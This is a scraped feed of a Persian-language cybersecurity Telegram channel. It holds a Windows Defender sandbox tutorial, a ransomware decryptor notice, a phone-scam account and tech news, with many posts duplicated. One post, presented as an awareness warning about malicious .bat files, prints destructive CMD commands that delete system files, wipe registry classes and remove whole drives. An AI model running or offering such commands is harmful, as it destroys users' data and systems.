افزودن حالت سندباکس به آنتیویروس ویندوز یا همان Windows Defender
ابزار ضد دژافزارِ مایکروسافت ویندوز یا همان Windows Defender تبدیل به اولین نرمافزار آنتیویروسی شده است که توانایی اجراشدن در داخل یک محیط سندباکس را دارد.
سندباکس یک فرآیند است که یک برنامه را در یک محیط امن و جدا از بقیه سیستمعامل و برنامههای کاربردی بر روی رایانه اجرا میکند. بهطوریکه اگر یک برنامه سندباکس به خطر افتاده باشد، این روش مانع آسیب آن ناشی از گسترش در خارج از منطقه بستهشده میشود.
پس از کشف چندین آسیبپذیری بحرانی در سالهای گذشته در چنین برنامههای قدرتمندی ازجمله Windows Defender که به مهاجمان اجازه میداد تا کنترل کامل سیستم را در اختیار گیرند، نیاز به سندباکس کردن یک ابزار آنتیویروس احساس میشد.
به همین دلیل مایکروسافت اعلام کرد که یک حالت سندباکس به Windows Defender خود اضافه خواهد کرد. بنابراین، اگر یک مهاجم یا یک برنامه موذی از یک نقص در Defender بهرهبرداری کند و موتور آنتیویروس را به خطر بیندازد، این آسیب نمیتواند به سایر قسمتهای سیستم منتقل شود.
نحوه فعال کردن ویژگی سندباکس در آنتیویروس Windows Defender
در حال حاضر، Windows Defender در حال اجرا بر روی ویندوز ۱۰، نسخه ۱۷۰۳ از ویژگی سندباکس پشتیبانی میکند که بهطور پیشفرض فعال نیست، اما شما میتوانید این ویژگی را با اجرای دستور زیر در سیستم خود فعال کنید:
سپس CMD یا Command Prompt را در قسمت Run تایپ کنید.
بر روی آن راست کلیک کرده و Run as administrator را انتخاب کنید.
سپس setx / M MP_FORCE_USE_SANDBOX 1 را تایپ کرده و سپس ENTER را فشار دهید.
درصورتی که با پیام خطا مواجه شدید دستور زیر را تایپ و اجرا کنید:
سپس کامپیوتر خود را مجدداً راهاندازی کنید.
setx MP_FORCE_USE_SANDBOX 1
منابع
[۱]https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox
[۲] https://thehackernews.com/2017/05/windows-rce-exploit.html
[۳] https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
ابزار ضد دژافزارِ مایکروسافت ویندوز یا همان Windows Defender تبدیل به اولین نرمافزار آنتیویروسی شده است که توانایی اجراشدن در داخل یک محیط سندباکس را دارد.
سندباکس یک فرآیند است که یک برنامه را در یک محیط امن و جدا از بقیه سیستمعامل و برنامههای کاربردی بر روی رایانه اجرا میکند. بهطوریکه اگر یک برنامه سندباکس به خطر افتاده باشد، این روش مانع آسیب آن ناشی از گسترش در خارج از منطقه بستهشده میشود.
پس از کشف چندین آسیبپذیری بحرانی در سالهای گذشته در چنین برنامههای قدرتمندی ازجمله Windows Defender که به مهاجمان اجازه میداد تا کنترل کامل سیستم را در اختیار گیرند، نیاز به سندباکس کردن یک ابزار آنتیویروس احساس میشد.
به همین دلیل مایکروسافت اعلام کرد که یک حالت سندباکس به Windows Defender خود اضافه خواهد کرد. بنابراین، اگر یک مهاجم یا یک برنامه موذی از یک نقص در Defender بهرهبرداری کند و موتور آنتیویروس را به خطر بیندازد، این آسیب نمیتواند به سایر قسمتهای سیستم منتقل شود.
نحوه فعال کردن ویژگی سندباکس در آنتیویروس Windows Defender
در حال حاضر، Windows Defender در حال اجرا بر روی ویندوز ۱۰، نسخه ۱۷۰۳ از ویژگی سندباکس پشتیبانی میکند که بهطور پیشفرض فعال نیست، اما شما میتوانید این ویژگی را با اجرای دستور زیر در سیستم خود فعال کنید:
سپس CMD یا Command Prompt را در قسمت Run تایپ کنید.
بر روی آن راست کلیک کرده و Run as administrator را انتخاب کنید.
سپس setx / M MP_FORCE_USE_SANDBOX 1 را تایپ کرده و سپس ENTER را فشار دهید.
درصورتی که با پیام خطا مواجه شدید دستور زیر را تایپ و اجرا کنید:
سپس کامپیوتر خود را مجدداً راهاندازی کنید.
setx MP_FORCE_USE_SANDBOX 1
منابع
[۱]https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox
[۲] https://thehackernews.com/2017/05/windows-rce-exploit.html
[۳] https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Microsoft Security Blog
Windows Defender Antivirus can now run in a sandbox | Microsoft Security Blog
Windows Defender Antivirus has hit a new milestone: the built-in antivirus capabilities on Windows can now run within a sandbox.
🚨هشدار‼️‼️‼️
🔴به هیچ عنوان کدهای زیر را اجرا نکنید و یا به دیگران ارایه ندهید
هدف این پست فقط آگاهی رسانی است
مسئولیت هر رویداد پس از اجرای کدهای زیر بر روی هر کامپیوتر صرفا برعهده مجری میباشد.
🚨کدهای_مخرب محیط CMD ویندوز
-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد...
--> پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کرده !
-> فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن !
-> حذف فایل مهم سیستمی "System32"
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔴به هیچ عنوان کدهای زیر را اجرا نکنید و یا به دیگران ارایه ندهید
هدف این پست فقط آگاهی رسانی است
مسئولیت هر رویداد پس از اجرای کدهای زیر بر روی هر کامپیوتر صرفا برعهده مجری میباشد.
🚨کدهای_مخرب محیط CMD ویندوز
-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد...
--> پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کرده !
-> فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن !
off
del %systemdrive%\*.*/f/s/q
shutdown –r –f –t 00
-> حذف فایل مهم سیستمی "System32"
c:\WINDOWS\SYSTEM32\*.*/q
-> حذف تمامی ریجستری ها !OFF
START reg delete HKCR/.EXE
START reg delete HKCR/.dll
START reg delete HKCR/*
-> فرمت درایو ها (خودتون میتونید تغییرشون دهید)D:\
rd/s/q C:\
rd/s/q E:\👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
عرضه ابزار رمزگشایی نسخههای جدید باجافزار STOP
از اواخر هفته گذشته کاربران و موسسات ایرانی هدف نسخه Pumas باجافزار STOP قرار گرفتهاند.
خوشبختانه موسس سایت id-ransomware.malwarehunterteam.com با مشارکت یک محقق ایرانی موفق به ساخت ابزاری برای رمزگشایی فایلهای رمزگذاری شده توسط نسخههای Puma،و Pumas و Pumax این باجافزار مخرب شده است.
ابزار مذکور از طریق لینک زیر قابل دریافت و استفاده است:
https://download.bleepingcomputer.com/demonslay335/STOPDecrypter.zip
توضیح اینکه بهمنظور شناسایی کلید رمزگذاری نیاز است که یک فایل رمز شده توسط باجافزار به همراه فایل اصلی آن (رمزگذاری نشده) در مسیر Settings | Bruteforcer به نرمافزار معرفی شود. حجم این دو فایل معرفی شده میبایست حداقل 150 کیلوبایت باشد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
از اواخر هفته گذشته کاربران و موسسات ایرانی هدف نسخه Pumas باجافزار STOP قرار گرفتهاند.
خوشبختانه موسس سایت id-ransomware.malwarehunterteam.com با مشارکت یک محقق ایرانی موفق به ساخت ابزاری برای رمزگشایی فایلهای رمزگذاری شده توسط نسخههای Puma،و Pumas و Pumax این باجافزار مخرب شده است.
ابزار مذکور از طریق لینک زیر قابل دریافت و استفاده است:
https://download.bleepingcomputer.com/demonslay335/STOPDecrypter.zip
توضیح اینکه بهمنظور شناسایی کلید رمزگذاری نیاز است که یک فایل رمز شده توسط باجافزار به همراه فایل اصلی آن (رمزگذاری نشده) در مسیر Settings | Bruteforcer به نرمافزار معرفی شود. حجم این دو فایل معرفی شده میبایست حداقل 150 کیلوبایت باشد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
گویا یک شرکت #فینتک چینی برای ارائه #وام از مشتریانش عکس لختی! میخواهد تا در صورتی که نتوانید بازپرداخت کنید، آن را منتشر کند و اگر استمهال بخواهید بازهم باید ویدیو بفرستید!!
مصرفگرایی و بیاخلاقی با همدیگر به اندازه کافی خطرناک هستند چه برسد با فناوری
منبع:
https://www.vice.com/amp/en_au/article/kzv38w/millennials-in-china-are-using-nudes-to-secure-loans?__twitter_impression=true
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
مصرفگرایی و بیاخلاقی با همدیگر به اندازه کافی خطرناک هستند چه برسد با فناوری
منبع:
https://www.vice.com/amp/en_au/article/kzv38w/millennials-in-china-are-using-nudes-to-secure-loans?__twitter_impression=true
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
This media is not supported in your browser
VIEW IN TELEGRAM
بازی با زبان سرخ
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
افرادی که از طریق یوتیوب درآمد میلیونی دارند
مجله فوربس کانال هایی را که بیشترین درآمد دارند را مشخص کرد.
به گزارش فوربس، بیشترین پرداختی یوتیوب به پسر هفت ساله ای به نام رایان بود که همراه والدین خود کانال "رایان اسباب بازی را ارزیابی می کند" را ایجاد کرده و در این کانال آنها به بررسی های اسباب بازی های مختلف می پردازند.
در این کانال بیش از 17 میلیون نفر ثبت نام کرده اند، که به لطف آن ویدئو وی 26 میلیارد بار مشاهده شده است. این کانال هر سال برای خانواده رایان 22 میلیون دلار به ارمغان می آورد.
نفردوم جیک پل است. او بیش از 17 میلیون ثبت نام کننده دارد که به طور مرتب ویدیوهای مختلف موسیقی و کمدی وی را تماشا می کند. درآمد سالانه او بیش از 21 میلیون دلار است.
رتبه سوم متعلق به گروه "دود پرفکت" است. پنج دوست در طول یک سال 20 میلیون دلار به خاطر فیلم هایی که در آن ترفندهایی را نشان دادند که با استفاده از وسایل مختلف از تجهیزات ورزشی گرفته تا یک بطری آب انجام می شد بدست آوردند. این کانال تقریبا 37 میلیون ثبت نام کننده دارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
مجله فوربس کانال هایی را که بیشترین درآمد دارند را مشخص کرد.
به گزارش فوربس، بیشترین پرداختی یوتیوب به پسر هفت ساله ای به نام رایان بود که همراه والدین خود کانال "رایان اسباب بازی را ارزیابی می کند" را ایجاد کرده و در این کانال آنها به بررسی های اسباب بازی های مختلف می پردازند.
در این کانال بیش از 17 میلیون نفر ثبت نام کرده اند، که به لطف آن ویدئو وی 26 میلیارد بار مشاهده شده است. این کانال هر سال برای خانواده رایان 22 میلیون دلار به ارمغان می آورد.
نفردوم جیک پل است. او بیش از 17 میلیون ثبت نام کننده دارد که به طور مرتب ویدیوهای مختلف موسیقی و کمدی وی را تماشا می کند. درآمد سالانه او بیش از 21 میلیون دلار است.
رتبه سوم متعلق به گروه "دود پرفکت" است. پنج دوست در طول یک سال 20 میلیون دلار به خاطر فیلم هایی که در آن ترفندهایی را نشان دادند که با استفاده از وسایل مختلف از تجهیزات ورزشی گرفته تا یک بطری آب انجام می شد بدست آوردند. این کانال تقریبا 37 میلیون ثبت نام کننده دارد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
🔴 قرارداد ۴۸۰ میلیون دلاری ارتش آمریکا با مایکروسافت
هدست واقعیت افزوده هولولنز در حال حاضر توسط ارتش های مختلف در دنیا برای آموزش و تمرین نیروها مورد استفاده قرار می گیرد. اما ارتش آمریکا به تازگی قراردادی با مایکروسافت (سازنده هولولنز) منعقد کرده که طبق آن، هدست مورد بحث در شرایط جنگی و برای عملیات های نظامی مورد استفاده قرار خواهد گرفت.
قرارداد ۴۸۰ میلیون دلاری ارتش آمریکا با کمپانی مایکروسافت که در راستای به روزرسانی نیروهای نظامی ایالات متحده تنظیم شده، قرار است برای افزایش کشندگی سربازان در میدان جنگ، توانایی تشخیص هدف، تصمیم گیری و درگیر شدن را پیش از آگاهی دشمن از شرایط فراهم کند. تعداد هدست های سفارش داده شده حداقل ۱۰۰ هزارتا اعلام شده است .
ارتش آمریکا به منظور تأمین نیاز خود، مناقصه ای برگزار کرد و طی آن از شرکت های غیر نظامی مانند مایکروسافت و مجیک لیپ برای ارائه طرح هایشان دعوت نمود.
ارتش برای هدست واقعیت افزوده مورد نظر الزاماتی دارد که عبارت اند از امکان دید در شب، سنجش تنفس و علائم حیاتی، محافظت از گوش ها و پایش ضربات وارده به سر. البته مشخص نیست مایکروسافت چگونه می خواهد الزامات مذکور را در هولولنز پیاده سازی کند.
هدست واقعیت افزوده هولولنز هیچوقت به صورت عمومی عرضه نشد و بیشتر توسط شرکت های مختلف به عنوان ابزاری برای تولید، آموزش، بازاریابی و سایر اهداف سازمانی مورد استفاده قرار گرفت. هدست مورد بحث همچنین توسط فضانوردان ایستگاه فضایی بین المللی نیز برای تمرینات خاص استفاده شده است.
بلومبرگ فارسی✔️
https://www.bloomberg.com/news/articles/2018-11-28/microsoft-wins-480-million-army-battlefield-contract
.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
هدست واقعیت افزوده هولولنز در حال حاضر توسط ارتش های مختلف در دنیا برای آموزش و تمرین نیروها مورد استفاده قرار می گیرد. اما ارتش آمریکا به تازگی قراردادی با مایکروسافت (سازنده هولولنز) منعقد کرده که طبق آن، هدست مورد بحث در شرایط جنگی و برای عملیات های نظامی مورد استفاده قرار خواهد گرفت.
قرارداد ۴۸۰ میلیون دلاری ارتش آمریکا با کمپانی مایکروسافت که در راستای به روزرسانی نیروهای نظامی ایالات متحده تنظیم شده، قرار است برای افزایش کشندگی سربازان در میدان جنگ، توانایی تشخیص هدف، تصمیم گیری و درگیر شدن را پیش از آگاهی دشمن از شرایط فراهم کند. تعداد هدست های سفارش داده شده حداقل ۱۰۰ هزارتا اعلام شده است .
ارتش آمریکا به منظور تأمین نیاز خود، مناقصه ای برگزار کرد و طی آن از شرکت های غیر نظامی مانند مایکروسافت و مجیک لیپ برای ارائه طرح هایشان دعوت نمود.
ارتش برای هدست واقعیت افزوده مورد نظر الزاماتی دارد که عبارت اند از امکان دید در شب، سنجش تنفس و علائم حیاتی، محافظت از گوش ها و پایش ضربات وارده به سر. البته مشخص نیست مایکروسافت چگونه می خواهد الزامات مذکور را در هولولنز پیاده سازی کند.
هدست واقعیت افزوده هولولنز هیچوقت به صورت عمومی عرضه نشد و بیشتر توسط شرکت های مختلف به عنوان ابزاری برای تولید، آموزش، بازاریابی و سایر اهداف سازمانی مورد استفاده قرار گرفت. هدست مورد بحث همچنین توسط فضانوردان ایستگاه فضایی بین المللی نیز برای تمرینات خاص استفاده شده است.
بلومبرگ فارسی✔️
https://www.bloomberg.com/news/articles/2018-11-28/microsoft-wins-480-million-army-battlefield-contract
.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Bloomberg.com
Microsoft Wins $480 Million Army Battlefield Contract
The military plans to purchase as many as 100,000 HoloLens augmented reality devices.
👁 داستان یک کلاهبرداری تلفنی
🔻شمارهی 9216148725 امشب با من تماس گرفت. گفت من از طرف همراه اول تماس میگیرم، شما چون همهی قبضهاتون توی یک سال اخیر رو به صورت اینترنتی و یا سامانه همراه پرداخت کردید و توی فرهنگسازی!! دست داشتید و کمک کردید، توی قرعهکشی شرکت داده شدید و برنده شدید.
🔻پرسید صاحب خط خودتونید؟ گفتم بله. اسمم رو گفت و گفت این نام خودتونه؟ گفتم بله. گفت جایزه پنج ملیون تومن کمکهزینه سفر به عتبات عالیاته. الان برنامهی ما زنده در حال پخشه، آقای آذری جهرمی مهمان برنامه هستن، وصلتون میکنیم لطفا صحبت سیاسی و اینها نکنید.
🔻مجری «برنامه!!» ازم یکسری سوال درباره نحوه و کیفیت سرویسهای همراه اول پرسید و بعد گفت مبارکتون باشه، همکارانم الان برای دریافت هدیه راهنماییتون میکنن. صداش خیلی هم قطع و وصل میشد.
🔻نفر بعدی که باهام صحبت کرد، اطلاعات شخصیم (شماره تلفن، زمانی که خط رو گرفتم، بانکهایی که توشون حساب دارم و شعبشون و شماره کارتهام و یک سری اطلاعات مثل نام والدینم) رو داشت و برام خوند. بعد گفت ما کمکهزینه رو در دو حوالهی ۲ملیون و ۵۰۰ی به دوتا کارت براتون واریز میکنیم.
🔻اما گفت باید همین الان برید از اون دوتا کارت ( بانکهایی که توشون حساب دارم رو نام برد) از خودپرداز موجودی بگیرید. گفتم کارتها همراهم نیست، گفت نیازه که قبل و بعد از واریز موجودی بگیرید، تا مطمئن بشید که مبلغ واریز شده. گفتم موجودیم رو میدونم. گفت رسید چاپی لازمه.
🔻من دیگه جدی شک کرده بودم، گفتم که الان نمیتونم برم دم خودپرداز، شمارهی مادرم رو گرفت و با هردوتامون صحبت کرد و گفت که باید برید دم خودپرداز موجودی بگیرید، و به مادرم گفت تماس رو قطع نکنید الان، بعد از گرفتن موجودی عدد ۱ رو بگیرید تا پروسه رو ادامه بدیم.
🔻ارتباط من رو قطع کرد، من اول تمام موجودی حسابم رو انتقال دادم به یه کارت دیگه، بعد زنگ زدم به همراه اول. با اپراتور صحبت کردم و شماره رو اعلام کردم، گفت مربوط به همراه اول نیست اصلا، هرچه زودتر از طریق مراجع قضایی پیگیری کنید تا کاری نکردن.
🔻توی این فاصله مادرم هم رفته بود دم خودپرداز و موجودیش رو انتقال داده بود به یه کارت دیگه. شخصی که باهاش صحبت میکرد، گفته چرا تراکنش انجام دادید و الان نمیشه ما بهتون واریز کنیم دیگه، بعد هم ازش خواسته بود که با حساب سپردهش موجودی بگیره. مادرم هم گفته اون کارت دم دستم نیست.
🔻طرف گفته پس ما مقدار کمتری رو واریز میکنیم به حسابتون، و یکسری مدارک نام برده که فردا با اینها برید بانک تا پول رو از حالت بلوکه دربیارید، و قطع کرده. مادرم با ۱۱۰ تماس گرفته و توضیح داده که چه اتفاقی افتاده، شماره رو اعلام کرده و گفتن که کلاهبرداریه و پیگیری میکنن.
🔻شماره مجددا با من تماس گرفت، گفت ما یک مقداری از مبلغ رو نمیتونیم واریز کنیم، به جاش براتون دوماه مکالمه رایگان فعال میکنیم. گفتم باشه. گفت اساماسش الان براتون میاد. منم گفتم باشه :))) و قطع کردم.
🔻هردو (من و مادرم) کارتهایی که باهاشون تراکنش انجام دادهبودیم (هرچند که انتقال وجه بود) رو سوزوندیم و شماره رو به همراه اول و پلیس اعلام کردیم و بعد از توی گوشی بلاک کردیم و داستان تموم شد. اما هنوز برام ترسناکه که اون کلاهبردار، همهی اطلاعتمون رو داشت.
منبع : توییتر
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔻شمارهی 9216148725 امشب با من تماس گرفت. گفت من از طرف همراه اول تماس میگیرم، شما چون همهی قبضهاتون توی یک سال اخیر رو به صورت اینترنتی و یا سامانه همراه پرداخت کردید و توی فرهنگسازی!! دست داشتید و کمک کردید، توی قرعهکشی شرکت داده شدید و برنده شدید.
🔻پرسید صاحب خط خودتونید؟ گفتم بله. اسمم رو گفت و گفت این نام خودتونه؟ گفتم بله. گفت جایزه پنج ملیون تومن کمکهزینه سفر به عتبات عالیاته. الان برنامهی ما زنده در حال پخشه، آقای آذری جهرمی مهمان برنامه هستن، وصلتون میکنیم لطفا صحبت سیاسی و اینها نکنید.
🔻مجری «برنامه!!» ازم یکسری سوال درباره نحوه و کیفیت سرویسهای همراه اول پرسید و بعد گفت مبارکتون باشه، همکارانم الان برای دریافت هدیه راهنماییتون میکنن. صداش خیلی هم قطع و وصل میشد.
🔻نفر بعدی که باهام صحبت کرد، اطلاعات شخصیم (شماره تلفن، زمانی که خط رو گرفتم، بانکهایی که توشون حساب دارم و شعبشون و شماره کارتهام و یک سری اطلاعات مثل نام والدینم) رو داشت و برام خوند. بعد گفت ما کمکهزینه رو در دو حوالهی ۲ملیون و ۵۰۰ی به دوتا کارت براتون واریز میکنیم.
🔻اما گفت باید همین الان برید از اون دوتا کارت ( بانکهایی که توشون حساب دارم رو نام برد) از خودپرداز موجودی بگیرید. گفتم کارتها همراهم نیست، گفت نیازه که قبل و بعد از واریز موجودی بگیرید، تا مطمئن بشید که مبلغ واریز شده. گفتم موجودیم رو میدونم. گفت رسید چاپی لازمه.
🔻من دیگه جدی شک کرده بودم، گفتم که الان نمیتونم برم دم خودپرداز، شمارهی مادرم رو گرفت و با هردوتامون صحبت کرد و گفت که باید برید دم خودپرداز موجودی بگیرید، و به مادرم گفت تماس رو قطع نکنید الان، بعد از گرفتن موجودی عدد ۱ رو بگیرید تا پروسه رو ادامه بدیم.
🔻ارتباط من رو قطع کرد، من اول تمام موجودی حسابم رو انتقال دادم به یه کارت دیگه، بعد زنگ زدم به همراه اول. با اپراتور صحبت کردم و شماره رو اعلام کردم، گفت مربوط به همراه اول نیست اصلا، هرچه زودتر از طریق مراجع قضایی پیگیری کنید تا کاری نکردن.
🔻توی این فاصله مادرم هم رفته بود دم خودپرداز و موجودیش رو انتقال داده بود به یه کارت دیگه. شخصی که باهاش صحبت میکرد، گفته چرا تراکنش انجام دادید و الان نمیشه ما بهتون واریز کنیم دیگه، بعد هم ازش خواسته بود که با حساب سپردهش موجودی بگیره. مادرم هم گفته اون کارت دم دستم نیست.
🔻طرف گفته پس ما مقدار کمتری رو واریز میکنیم به حسابتون، و یکسری مدارک نام برده که فردا با اینها برید بانک تا پول رو از حالت بلوکه دربیارید، و قطع کرده. مادرم با ۱۱۰ تماس گرفته و توضیح داده که چه اتفاقی افتاده، شماره رو اعلام کرده و گفتن که کلاهبرداریه و پیگیری میکنن.
🔻شماره مجددا با من تماس گرفت، گفت ما یک مقداری از مبلغ رو نمیتونیم واریز کنیم، به جاش براتون دوماه مکالمه رایگان فعال میکنیم. گفتم باشه. گفت اساماسش الان براتون میاد. منم گفتم باشه :))) و قطع کردم.
🔻هردو (من و مادرم) کارتهایی که باهاشون تراکنش انجام دادهبودیم (هرچند که انتقال وجه بود) رو سوزوندیم و شماره رو به همراه اول و پلیس اعلام کردیم و بعد از توی گوشی بلاک کردیم و داستان تموم شد. اما هنوز برام ترسناکه که اون کلاهبردار، همهی اطلاعتمون رو داشت.
منبع : توییتر
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Twitter
گربه حنایی
۱/ شمارهی ۰۲۱۶۱۴۸۷۲۵ امشب با من تماس گرفت. گفت من از طرف همراه اول تماس میگیرم، شما چون همهی قبضهاتون توی یک سال اخیر رو به صورت اینترنتی و یا سامانه همراه پرداخت کردید و توی فرهنگسازی!! دست داشتید و کمک کردید، توی قرعهکشی شرکت داده شدید و برنده شدید.
This media is not supported in your browser
VIEW IN TELEGRAM
#ربات های گارسون
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
📲 مردم کوبا از امروز میتوانند از اینترنت موبایل (تری جی) استفاده کنند.
🔸اتسکا، شرکت خدمات اینترنتی میگوید که شهروندان کوبایی از امروز میتوانند برای برخورداری از این سرویس ثبت نام کنند.
🔸تا کنون در کوبا افراد از وای فای مکانهای مختلف و کافههای اینترنتی استفاده میکردند و سرویس اینرنتی موبایل محدود به کارمندان دولت، خبرنگاران و تاجران خارجی بوده است.
🔹البته همچنان برای بسیاری در کوبا استفاده از اینترنت موبایل به دلیل هزینه بالای آن ممکن نخواهد بود.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
🔸اتسکا، شرکت خدمات اینترنتی میگوید که شهروندان کوبایی از امروز میتوانند برای برخورداری از این سرویس ثبت نام کنند.
🔸تا کنون در کوبا افراد از وای فای مکانهای مختلف و کافههای اینترنتی استفاده میکردند و سرویس اینرنتی موبایل محدود به کارمندان دولت، خبرنگاران و تاجران خارجی بوده است.
🔹البته همچنان برای بسیاری در کوبا استفاده از اینترنت موبایل به دلیل هزینه بالای آن ممکن نخواهد بود.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Telegram
کانال تخصصی امنیت سایبری «کتاس»
تماس با ادمين📧:
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
ict.sec@outlook.com
این کانال به جهت آگاهی رساني، مخاطرات امنیتی درحوزه هایICTوICSرابارویکردامن سازی دربرابرخطرات،منتشر و وابسته به هیچ نهاد،گروه،دسته،تشکّل ویاسازمانی نيست ومسئولیت هرگونه استفاده ازمطالب فقط برعهده کاربرش است
انتشار به روز رسانی امنیتیجدید توسط ادوبی
Adobe Releases Security Updates
https://helpx.adobe.com/security/products/flash-player/apsb18-42.html
#Cyber #InfoSec #Cybersecurity
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Adobe Releases Security Updates
https://helpx.adobe.com/security/products/flash-player/apsb18-42.html
#Cyber #InfoSec #Cybersecurity
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
Adobe
Free and discontinued products | Support options
Phone and chat support is not available for free or discontinued software or services. Learn what other support resources might be available.
This media is not supported in your browser
VIEW IN TELEGRAM
☣️ ویدیو: حفاظت از کودکان و نوجوانان در فضای سایبری
( CyberSafety for Kids )
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
( CyberSafety for Kids )
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
چاپ گوشت با پرینتر سه بعدی در اسرائیل
استارت آپ جت ایت، تحت مدیریت قصاب سابق با پرینتر سه بعدی گوشت 100 گیاهی ساخت که گفته می شود از گوشت طبیعی تشخیص داده نمی شود.
به منظور چاپ گوشت، کارشناسان "جت ایت" یک چاپگر ویژه سه بعدی طراحی کرده اند.
برای ساخت این چاپگر از کمک یاشار بن شیتریت، مدیر استارت آپ که یک قصاب سابق است استفاده شده است وی تصمیم به استفاده از دانش حرفه ای خود برای ایجاد گوشت مصنوعی، که بافت آن کاملا شبیه به گوشت باشد گرفته است.
وی گفت: گوشت از بافت عضلانی، چربی، میوگلوبین و بافت همبند ساخته شده است و در ادامه توضیح داد: با کمک یک چاپگر سه بعدی و تنظیمات دقیق، ما توانستیم یک ماتریس پیچیده ایجاد کنیم که ساختار گوشت را به طور کامل تکرار کند..
استارت آپ جت ایت در سال 2018 و با 5 کارمند تاسیس شد.
👨🏻🎓👩🏻🎓کتاس آمادگینشر نظرات و دیدگاههای شما را دارد
🦁«کتاس»
http://t.me/ict_security
استارت آپ جت ایت، تحت مدیریت قصاب سابق با پرینتر سه بعدی گوشت 100 گیاهی ساخت که گفته می شود از گوشت طبیعی تشخیص داده نمی شود.
